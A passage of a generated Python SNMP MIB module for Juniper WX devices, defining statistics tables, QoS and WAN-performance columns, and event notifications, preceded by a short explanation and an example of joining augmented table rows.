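The `registerAugmentions`/`setIndexNames(*getIndexNames())` pair above emulates the SMIv2 AUGMENTS clause: each `jnxWxAsmStatsEntry` row shares the `jnxWxAsmIndex` of its corresponding `jnxWxAsmEntry` row. A minimal sketch (with hypothetical row data, not values from any real agent) of how a manager might join the two tables on that shared index:

```python
# Hypothetical polled rows, keyed by jnxWxAsmIndex. The AUGMENTS relation
# guarantees a one-to-one correspondence between the two tables.
asm_table = {
    1: {"jnxWxAsmIpAddress": "192.0.2.10"},
    2: {"jnxWxAsmIpAddress": "192.0.2.20"},
}
asm_stats_table = {
    1: {"jnxWxAsmStatsBytesIn": 1000, "jnxWxAsmStatsBytesOut": 800},
    2: {"jnxWxAsmStatsBytesIn": 500, "jnxWxAsmStatsBytesOut": 300},
}

# Join base and augmenting rows on the common index.
joined = {
    idx: {**asm_table[idx], **asm_stats_table.get(idx, {})}
    for idx in asm_table
}

print(joined[1]["jnxWxAsmIpAddress"])      # 192.0.2.10
print(joined[1]["jnxWxAsmStatsBytesIn"])   # 1000
```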
jnxWxVirtEndptTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3), )
if mibBuilder.loadTexts: jnxWxVirtEndptTable.setStatus('current')
jnxWxVirtEndptEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxVirtEndptIndex"))
if mibBuilder.loadTexts: jnxWxVirtEndptEntry.setStatus('current')
jnxWxVirtEndptIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxVirtEndptIndex.setStatus('current')
jnxWxVirtEndptName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3, 1, 2), TcAppName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxVirtEndptName.setStatus('current')
jnxWxVirtEndptSubnetCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 5, 3, 1, 3), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxVirtEndptSubnetCount.setStatus('current')
jnxWxApp = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6))
if mibBuilder.loadTexts: jnxWxApp.setStatus('current')
jnxWxAppTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 1), )
if mibBuilder.loadTexts: jnxWxAppTable.setStatus('current')
jnxWxAppEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 1, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAppIndex"))
if mibBuilder.loadTexts: jnxWxAppEntry.setStatus('current')
jnxWxAppIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxAppIndex.setStatus('current')
jnxWxAppAppName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 1, 1, 2), TcAppName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppAppName.setStatus('current')
jnxWxAppStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2), )
if mibBuilder.loadTexts: jnxWxAppStatsTable.setStatus('current')
jnxWxAppStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAsmIndex"), (0, "JUNIPER-WX-MIB", "jnxWxAppIndex"))
if mibBuilder.loadTexts: jnxWxAppStatsEntry.setStatus('current')
jnxWxAppStatsBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsBytesIn.setStatus('current')
jnxWxAppStatsBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsBytesOut.setStatus('current')
jnxWxAppStatsBytesInPercent = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsBytesInPercent.setStatus('current')
jnxWxAppStatsAppName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 4), TcAppName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsAppName.setStatus('current')
jnxWxAppStatsAccelBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsAccelBytesIn.setStatus('current')
jnxWxAppStatsActiveSessionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsActiveSessionTime.setStatus('current')
jnxWxAppStatsEstBoostBytes = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsEstBoostBytes.setStatus('current')
jnxWxAppStatsBytesOutWxc = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 2, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppStatsBytesOutWxc.setStatus('current')
jnxWxAppAggrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3), )
if mibBuilder.loadTexts: jnxWxAppAggrStatsTable.setStatus('current')
jnxWxAppAggrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3, 1), )
jnxWxAppEntry.registerAugmentions(("JUNIPER-WX-MIB", "jnxWxAppAggrStatsEntry"))
jnxWxAppAggrStatsEntry.setIndexNames(*jnxWxAppEntry.getIndexNames())
if mibBuilder.loadTexts: jnxWxAppAggrStatsEntry.setStatus('current')
jnxWxAppAggrStatsBytesInRe = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppAggrStatsBytesInRe.setStatus('current')
jnxWxAppAggrStatsBytesOutRe = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppAggrStatsBytesOutRe.setStatus('current')
jnxWxAppAggrStatsBytesInPercent = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 3, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAppAggrStatsBytesInPercent.setStatus('current')
jnxWxWanStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 4), )
if mibBuilder.loadTexts: jnxWxWanStatsTable.setStatus('current')
jnxWxWanStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 4, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAsmIndex"), (0, "JUNIPER-WX-MIB", "jnxWxAppIndex"))
if mibBuilder.loadTexts: jnxWxWanStatsEntry.setStatus('current')
jnxWxWanStatsBytesToWan = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 4, 1, 1), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWanStatsBytesToWan.setStatus('current')
jnxWxWanStatsBytesFromWan = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 4, 1, 2), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWanStatsBytesFromWan.setStatus('current')
jnxWxAccelAppNameTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 5), )
if mibBuilder.loadTexts: jnxWxAccelAppNameTable.setStatus('current')
jnxWxAccelAppNameEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 5, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAccelAppIndex"))
if mibBuilder.loadTexts: jnxWxAccelAppNameEntry.setStatus('current')
jnxWxAccelAppIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 5, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxAccelAppIndex.setStatus('current')
jnxWxAccelAppName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 5, 1, 2), TcAppName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAccelAppName.setStatus('current')
jnxWxAccelAppStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 6), )
if mibBuilder.loadTexts: jnxWxAccelAppStatsTable.setStatus('current')
jnxWxAccelAppStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 6, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxAsmIndex"), (0, "JUNIPER-WX-MIB", "jnxWxAccelAppIndex"))
if mibBuilder.loadTexts: jnxWxAccelAppStatsEntry.setStatus('current')
jnxWxAccelAppTimeWithAccel = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 6, 1, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAccelAppTimeWithAccel.setStatus('current')
jnxWxAccelAppTimeWithoutAccel = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 6, 6, 1, 4), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxAccelAppTimeWithoutAccel.setStatus('current')
jnxWxBurstStats = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7))
if mibBuilder.loadTexts: jnxWxBurstStats.setStatus('current')
jnxWxBurstStatsStartTime = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7, 1), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxBurstStatsStartTime.setStatus('current')
jnxWxBurstStatsBpsIn = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxBurstStatsBpsIn.setStatus('current')
jnxWxBurstStatsBpsOut = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxBurstStatsBpsOut.setStatus('current')
jnxWxBurstStatsBpsPt = MibScalar((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 7, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxBurstStatsBpsPt.setStatus('current')
jnxWxQos = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10))
if mibBuilder.loadTexts: jnxWxQos.setStatus('current')
jnxWxQosEndptTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 1), )
if mibBuilder.loadTexts: jnxWxQosEndptTable.setStatus('current')
jnxWxQosEndptEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 1, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxQosEndptIndex"))
if mibBuilder.loadTexts: jnxWxQosEndptEntry.setStatus('current')
jnxWxQosEndptIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxQosEndptIndex.setStatus('current')
jnxWxQosEndptIdentifier = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 1, 1, 2), TcQosIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosEndptIdentifier.setStatus('current')
jnxWxQosClassTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 2), )
if mibBuilder.loadTexts: jnxWxQosClassTable.setStatus('current')
jnxWxQosClassEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 2, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxQosClassIndex"))
if mibBuilder.loadTexts: jnxWxQosClassEntry.setStatus('current')
jnxWxQosClassIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 2, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxQosClassIndex.setStatus('current')
jnxWxQosClassName = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 2, 1, 2), TcQosIdentifier()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosClassName.setStatus('current')
jnxWxQosStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3), )
if mibBuilder.loadTexts: jnxWxQosStatsTable.setStatus('current')
jnxWxQosStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxQosEndptIndex"), (0, "JUNIPER-WX-MIB", "jnxWxQosClassIndex"))
if mibBuilder.loadTexts: jnxWxQosStatsEntry.setStatus('current')
jnxWxQosStatsBytesIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 3), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsBytesIn.setStatus('current')
jnxWxQosStatsBytesOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 4), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsBytesOut.setStatus('current')
jnxWxQosStatsBytesDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 5), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsBytesDropped.setStatus('current')
jnxWxQosStatsPktsIn = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 6), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsPktsIn.setStatus('current')
jnxWxQosStatsPktsOut = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 7), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsPktsOut.setStatus('current')
jnxWxQosStatsPktsDropped = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 10, 3, 1, 8), Counter64()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxQosStatsPktsDropped.setStatus('current')
jnxWxWanPerf = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14))
if mibBuilder.loadTexts: jnxWxWanPerf.setStatus('current')
jnxWxWpEndptTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 1), )
if mibBuilder.loadTexts: jnxWxWpEndptTable.setStatus('current')
jnxWxWpEndptEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 1, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxWpEndptIndex"))
if mibBuilder.loadTexts: jnxWxWpEndptEntry.setStatus('current')
jnxWxWpEndptIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 1, 1, 1), Integer32())
if mibBuilder.loadTexts: jnxWxWpEndptIndex.setStatus('current')
jnxWxWpEndptIp = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 1, 1, 2), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpEndptIp.setStatus('current')
jnxWxWpStatsTable = MibTable((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2), )
if mibBuilder.loadTexts: jnxWxWpStatsTable.setStatus('current')
jnxWxWpStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1), ).setIndexNames((0, "JUNIPER-WX-MIB", "jnxWxWpEndptIndex"))
if mibBuilder.loadTexts: jnxWxWpStatsEntry.setStatus('current')
jnxWxWpStatsLatencyThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 3), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLatencyThresh.setStatus('current')
jnxWxWpStatsAvgLatency = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 4), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsAvgLatency.setStatus('current')
jnxWxWpStatsLatencyCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 5), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLatencyCount.setStatus('current')
jnxWxWpStatsLatencyAboveThresh = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 6), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLatencyAboveThresh.setStatus('current')
jnxWxWpStatsLatencyAboveThreshCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 7), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLatencyAboveThreshCount.setStatus('current')
jnxWxWpStatsLossPercent = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 8), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLossPercent.setStatus('current')
jnxWxWpStatsLossCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 9), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLossCount.setStatus('current')
jnxWxWpStatsEventCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 10), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsEventCount.setStatus('current')
jnxWxWpStatsDiversionCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 11), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsDiversionCount.setStatus('current')
jnxWxWpStatsReturnCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 12), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsReturnCount.setStatus('current')
jnxWxWpStatsLastDown = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 13), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsLastDown.setStatus('current')
jnxWxWpStatsUnavailableCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 14), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsUnavailableCount.setStatus('current')
jnxWxWpStatsMinuteCount = MibTableColumn((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 2, 14, 2, 1, 15), Unsigned32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: jnxWxWpStatsMinuteCount.setStatus('current')
jnxWxEventObjs = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 1))
if mibBuilder.loadTexts: jnxWxEventObjs.setStatus('current')
jnxWxEventEvents = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2))
if mibBuilder.loadTexts: jnxWxEventEvents.setStatus('current')
jnxWxEventEventsV2 = ObjectIdentity((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0))
if mibBuilder.loadTexts: jnxWxEventEventsV2.setStatus('current')
jnxWxEventRipAuthFailure = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 1)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventRipAuthFailure.setStatus('current')
jnxWxEventCompressionBufferOverflow = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 2)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventCompressionBufferOverflow.setStatus('current')
jnxWxEventCompressionSessionClosed = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 3)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventCompressionSessionClosed.setStatus('current')
jnxWxEventDecompressionSessionClosed = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 4)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDecompressionSessionClosed.setStatus('current')
jnxWxEventCompressionSessionOpened = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 5)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventCompressionSessionOpened.setStatus('current')
jnxWxEventDecompressionSessionOpened = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 6)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDecompressionSessionOpened.setStatus('current')
jnxWxEventPrimaryRegServerUnreachable = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 7)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPrimaryRegServerUnreachable.setStatus('current')
jnxWxEventSecondaryRegServerUnreachable = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 8)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventSecondaryRegServerUnreachable.setStatus('current')
jnxWxEventMultiNodeMasterUp = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 9)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiNodeMasterUp.setStatus('current')
jnxWxEventMultiNodeMasterDown = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 10)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiNodeMasterDown.setStatus('current')
jnxWxEventMultiNodeLastUp = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 11)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiNodeLastUp.setStatus('current')
jnxWxEventMultiNodeLastDown = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 12)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiNodeLastDown.setStatus('current')
jnxWxEventPrimaryDownBackupEngaged = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 13)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPrimaryDownBackupEngaged.setStatus('current')
jnxWxEventPrimaryDownBackupEngageFailed = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 14)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPrimaryDownBackupEngageFailed.setStatus('current')
jnxWxEventPrimaryUpBackupDisengaged = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 15)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPrimaryUpBackupDisengaged.setStatus('current')
jnxWxEventMultiPathStatusChange = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 16)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventMultiPathStatusChange.setStatus('current')
jnxWxEventDiskFailure = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 17)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDiskFailure.setStatus('current')
jnxWxEventWanPerfStatusChange = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 18)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventWanPerfStatusChange.setStatus('current')
jnxWxEventDCQAboveHiWatermark = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 19)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDCQAboveHiWatermark.setStatus('current')
jnxWxEventDCQBelowHiWatermark = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 20)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventDCQBelowHiWatermark.setStatus('current')
jnxWxEventPerformanceThreshCrossed = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 21)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventPerformanceThreshCrossed.setStatus('current')
jnxWxEventClientLinkDown = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 22)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventClientLinkDown.setStatus('current')
jnxWxEventClientLinkUp = NotificationType((1, 3, 6, 1, 4, 1, 8239, 2, 2, 1, 3, 2, 0, 23)).setObjects(("JUNIPER-WX-COMMON-MIB", "jnxWxCommonEventDescr"))
if mibBuilder.loadTexts: jnxWxEventClientLinkUp.setStatus('current')
mibBuilder.exportSymbols("JUNIPER-WX-MIB", jnxWxAccelAppTimeWithoutAccel=jnxWxAccelAppTimeWithoutAccel, jnxWxAsmStatsBytesOut=jnxWxAsmStatsBytesOut, jnxWxSysStatsThruputOut=jnxWxSysStatsThruputOut, jnxWxSysStats=jnxWxSysStats, jnxWxWpStatsTable=jnxWxWpStatsTable, jnxWxSysStatsPktSizeIn3=jnxWxSysStatsPktSizeIn3, jnxWxSysStatsPktsPtFilter=jnxWxSysStatsPktsPtFilter, jnxWxApp=jnxWxApp, jnxWxAppStatsAppName=jnxWxAppStatsAppName, jnxWxWpEndptEntry=jnxWxWpEndptEntry, jnxWxQosStatsPktsIn=jnxWxQosStatsPktsIn, jnxWxQosStatsBytesIn=jnxWxQosStatsBytesIn, jnxWxStatsQosEndptCount=jnxWxStatsQosEndptCount, jnxWxSysStatsPktsOutAe=jnxWxSysStatsPktsOutAe, jnxWxQos=jnxWxQos, jnxWxStatsAsmCount=jnxWxStatsAsmCount, jnxWxSysStatsBytesOutRe=jnxWxSysStatsBytesOutRe, jnxWxAsmEntry=jnxWxAsmEntry, jnxWxBurstStatsBpsPt=jnxWxBurstStatsBpsPt, jnxWxAppAggrStatsBytesOutRe=jnxWxAppAggrStatsBytesOutRe, jnxWxAccelAppNameEntry=jnxWxAccelAppNameEntry, jnxWxSysStatsBytesPtNoAe=jnxWxSysStatsBytesPtNoAe, jnxWxWpStatsLatencyAboveThresh=jnxWxWpStatsLatencyAboveThresh, jnxWxWpStatsLossCount=jnxWxWpStatsLossCount, jnxWxSysStatsPktsTpPt=jnxWxSysStatsPktsTpPt, jnxWxEventCompressionSessionOpened=jnxWxEventCompressionSessionOpened, jnxWxSysStatsPktSizeIn1=jnxWxSysStatsPktSizeIn1, jnxWxBurstStatsStartTime=jnxWxBurstStatsStartTime, 